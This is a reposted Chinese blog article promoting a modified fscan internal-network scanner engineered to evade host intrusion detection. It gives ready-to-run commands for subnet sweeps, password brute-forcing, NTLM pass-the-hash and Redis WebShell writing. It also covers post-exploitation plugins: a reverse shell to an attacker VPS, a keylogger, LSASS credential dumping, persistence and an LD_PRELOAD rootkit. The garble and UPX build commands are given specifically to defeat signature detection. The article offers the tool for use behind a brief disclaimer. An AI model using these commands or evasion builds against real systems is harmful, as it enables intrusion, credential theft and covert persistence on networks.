文章总结: 本文介绍基于fscanv2.1.3魔改的内网扫描工具,通过参数混淆、去除特征字符串及garble构建降低被HIDS识别概率。文章详述参数映射关系、实战命令、后渗透插件、构建方法及WebUI模式,适用于授权渗透测试和红队演练场景。 综合评分: 65 文章分类: 红队,内网渗透,安全工具,免杀
Fscan魔改版:专为红队场景打造的内网扫描工具
幻泉之洲
2026年9月8日 10:32 北京
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
基于fscan v2.1.3修改的内网扫描工具,参数全部混淆、去除特征字符串,配合garble构建可大幅降低被HIDS识别的概率。本文梳理了魔改版的参数映射关系、完整用法和实战命令。
做内网渗透的都知道fscan。扫描快、功能全、一条命令搞定存活探测到弱口令爆破。问题是原版的参数名和特征早就进了各家的检测规则库,上去扫一圈,蓝队的告警比你的扫描结果还多。
这个魔改版解决的就是这件事。它把命令行参数全部改了名,去掉了启动时的Banner和版本信息,Go模块路径也不叫fscan了。再配合garble混淆构建和UPX压缩,官方的说法是能有效规避HIDS特征检测。
工具地址:基于 shadow1ng/fscan v2.1.3 修改,原项目见 https://github.com/shadow1ng/fscan 。官方建议配合 https://github.com/webzzaa/pscan-loader 使用,效果更好。
01 魔改了什么
先说清楚,这不是重新开发的工具,是在原版fscan基础上做的针对性修改。改动集中在四个方面:
- 参数名全部换了,比如原来的
-h(帮助)现在是-t(目标) - 启动时不再打印fscan的ASCII Logo和版本号
- Go模块路径改成
test,二进制里搜不到fscan关键字 - 源码中所有fscan相关字符串清理干净
参数对照表如下,用惯了原版的需要适应一下:
| 原版参数 | 魔改后 | 说明 | | — | — | — | | -h | -t | 目标IP/网段/域名 | | -eh | -et | 排除主机 | | -ehf | -etf | 排除主机文件 | | -p / -p-tp | -tp | 端口 | | -ep | -etp | 排除端口 | | -hf(原主机文件) | -tf | 主机列表文件 | | -pf(原端口文件) | -tpf | 端口列表文件 | | -userf | -uf | 用户名字典 | | -pwdf | -pf | 密码字典 | | -uf(原URL文件) | -urlf | URL列表文件 | | -u(原URL) | -url | Web目标URL | | -user | -usr | 用户名 | | -pwd | -pw | 密码 | | -usera | -ua | 额外用户名 | | -pwda | -pa | 额外密码 | | -upf | -up | 用户名:密码对文件 | | -hash | -hv | 哈希值 | | -hashf | -hf | 哈希文件 | | -domain | -dm | 域名 | | -sshkey | -sk | SSH私钥 | | -m | -st | 扫描模式 | | -t(线程) | -tn | 端口扫描线程数 | | -time | -tm | 超时时间(秒) | | -o | -out | 输出文件 | | -f | -fmt | 输出格式 |
说实话,参数映射这一步适应成本不高,用两次就记住了。关键是构建环节,官方强调必须用garble,不要用普通go build。后面构建章节会给出完整命令。
02 快速上手
最基本的用法,一条命令扫完C段:
扫描一个C段(存活探测+端口扫描+服务识别+弱口令爆破+POC)
fscan.exe -t 192.168.1.0/24
仅存活探测
fscan.exe -t 192.168.1.0/24 -ao
扫描单个主机
fscan.exe -t 192.168.1.100
扫描多个IP段
fscan.exe -t 192.168.1.0/24,10.0.0.0/24
从文件读取目标
fscan.exe -tf targets.txt
和原版的区别就是参数名变了。默认行为也一样:先ICMP存活探测,然后端口扫描,识别服务,自动跑弱口令爆破和POC检测。如果只是想快速看看哪些主机活着,加-ao就行。
这里有个细节值得注意:默认会扫1000个常用端口,爆破也是自动开的。如果只想做端口扫描和服务识别,记得加-nobr,不然爆破模块会拖慢整体进度。
03 常用实战场景
端口与协议控制
指定端口扫描:
扫描指定端口
fscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379
扫描常用Web端口
fscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090
排除特定端口
fscan.exe -t 192.168.1.0/24 -etp 445,139
跳过Ping探测(禁Ping环境用)
fscan.exe -t 192.168.1.0/24 -np
流量大的环境要注意限速,-rate参数可以控制每分钟最大发包数。默认600线程扫C段速度很快,但某些IDS对突发连接敏感,降到200线程、rate限制到1000会安静很多。参数是-tn 200 -rate 1000。
弱口令爆破
默认自动爆破,可以指定自定义凭据:
指定单个凭据
fscan.exe -t 192.168.1.0/24 -usr admin -pw admin123
使用字典文件
fscan.exe -t 192.168.1.0/24 -uf users.txt -pf pass.txt
用户名:密码对文件(每行user:pass)
fscan.exe -t 192.168.1.0/24 -up creds.txt
添加额外凭据(与原字典合并)
fscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password
哈希传递也直接支持:
NTLM哈希传递
fscan.exe -t 192.168.1.100 -hv “aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0”
批量哈希传递
fscan.exe -t 192.168.1.0/24 -hf hashes.txt
Web扫描与POC检测
支持独立Web扫描模式:
扫描单个Web站点
fscan.exe -url http://192.168.1.100:8080
带Cookie扫描
fscan.exe -url http://192.168.1.100 -cookie “PHPSESSID=xxx”
使用HTTP代理
fscan.exe -url http://192.168.1.100 -proxy http://127.0.0.1:8080
POC有几种模式:默认跑内置的常见漏洞检测,-full跑全量POC(更慢但更全),-pocname指定单个POC,-pocpath加载自定义POC目录。
后渗透功能
魔改版内置了不少后渗透插件,通过-local参数调用:
列出所有本地插件
fscan.exe -local list
反弹Shell(先在外网VPS监听)
fscan.exe -local reverseshell -rsh your-vps.com:4444
启动SOCKS5代理(本地监听1080)
fscan.exe -local socks5proxy -start-socks5 1080
键盘记录
fscan.exe -local keylogger -keylog-output keylog.txt
LSASS凭证提取
fscan.exe -local minidump
插件列表挺全的:Windows持久化有注册表、计划任务、服务、启动项、WMI、BITS、IFEO等七八种方式,Linux有Cron、Systemd、LD_PRELOAD。清理痕迹用-local cleaner,杀软检测用-local avdetect。具体完整的插件表可以参考下面这个列表:
| 插件名 | 功能 | 平台 | | — | — | — | | systeminfo | 系统信息收集 | 全平台 | | reverseshell | 反弹Shell | 全平台 | | forwardshell | 正向Shell | Windows | | socks5proxy | SOCKS5代理 | 全平台 | | keylogger | 键盘记录 | Windows | | minidump | LSASS凭据提取 | Windows | | sshkey | SSH公钥注入 | Linux | | cleaner | 痕迹清理 | 全平台 | | crontask | Cron持久化 | Linux | | ldpreload | LD_PRELOAD Rootkit | Linux | | winregistry | 注册表持久化 | Windows | | winschtask | 计划任务持久化 | Windows | | winwmi | WMI持久化 | Windows | | avdetect | 杀软检测 | Windows | | download | 文件下载 | 全平台 |
04 支持的爆破服务
覆盖了内网常见的协议:
- 数据库:MySQL(3306)、MSSQL(1433)、Oracle(1521)、PostgreSQL(5432)、Redis(6379)、MongoDB(27017)、Elasticsearch(9200)
- 远程服务:SSH(22)、FTP(21)、Telnet(23)、SMB(445)、RDP(3389)、VNC(5900)
- 其他:LDAP(389)、SMTP(25)、SNMP(161/UDP)、Rsync(873)、Memcached(11211)、RabbitMQ(5672)、Kafka(9092)、Zookeeper(2181)等等
Redis比较特殊,除了爆破还支持写公钥、写WebShell:
Redis写公钥
fscan.exe -t 192.168.1.100 -st redis -rs “ssh-rsa AAAAB3N…”
Redis写WebShell
fscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc “
05 扫描模式
通过-st指定模式。常用的几个:
| 模式 | 说明 | | — | — | | all | 默认,完整扫描流程 | | icmp | 仅ICMP存活探测 | | portscan | 仅端口扫描 | | redis | 仅Redis扫描+利用 | | ssh | 仅SSH扫描+爆破 | | mysql | 仅MySQL扫描+爆破 | | smb | 仅SMB扫描+MS17010 | | rdp | 仅RDP扫描+爆破 |
其他服务插件名也可以直接作为模式传入。比如只想扫MSSQL,就-st mssql。这个设计比原版灵活,适合目标明确的时候做精准打击。
06 构建方法
此版本必须用garble混淆构建,普通go build不会产生预期效果。
标准版(garble混淆构建)
garble -tiny -literals -seed=random build -ldflags=”-s -w -buildid=” -trimpath -o fscan.exe .
精简版(不含后渗透模块)
garble -tiny -literals -seed=random build -tags nolocal -ldflags=”-s -w -buildid=” -trimpath -o fscan-nolocal.exe .
Web版
garble -tiny -literals -seed=random build -tags web -ldflags=”-s -w -buildid=” -trimpath -o fscan-web.exe .
UPX压缩(LZMA算法,约30MB压缩到8-10MB)
upx –best –lzma fscan.exe -o fscan-upx.exe
几个参数的含义:-literals混淆字符串和整数字面量,-tiny剥离符号表并缩减PE段表,-seed=random每次构建生成不同的混淆结果,-buildid=清空build ID去掉编译器指纹。UPX用--best --lzma对Go二进制的压缩率最好。
注意-o输出到新文件,保留garble原始产物作为备份,这样出问题时还能回溯。
07 WebUI模式
用-tags web编译出来的Web版内置了管理界面,启动后访问 http://127.0.0.1:8080 。功能包括图形化扫描任务管理、实时WebSocket结果推送、扫描预设保存、资产项目管理,支持中文和英文切换,还有深色模式。
适合团队协作场景,不用每个人都记命令行参数。
08 输出控制
默认输出到result.txt,可以指定格式:
JSON输出
fscan.exe -t 192.168.1.0/24 -fmt json -out result.json
CSV输出
fscan.exe -t 192.168.1.0/24 -fmt csv -out result.csv
不保存文件
fscan.exe -t 192.168.1.0/24 -no
静默模式
fscan.exe -t 192.168.1.0/24 -silent
性能统计
fscan.exe -t 192.168.1.0/24 -perf
总的来说,这个魔改版的核心价值就两个:去特征、加后渗透。参数混淆降低了被检测的概率,内置的持久化和凭据提取插件让它在拿到权限之后还能继续用。适应成本就是记住新参数名,大概十分钟的事。
适合授权渗透测试和红队演练中使用。内网扫描场景基本可以替代原版fscan,前提是你对参数映射足够熟悉。
获取方式:私信回复”pscan”获取
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:幻泉之洲 《Fscan魔改版:专为红队场景打造的内网扫描工具》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。





![[工具推荐]基于mitmproxy/mitmdump的被动流量安全检测工具-FlowLens](/images/random/titlepic/4.jpg)


评论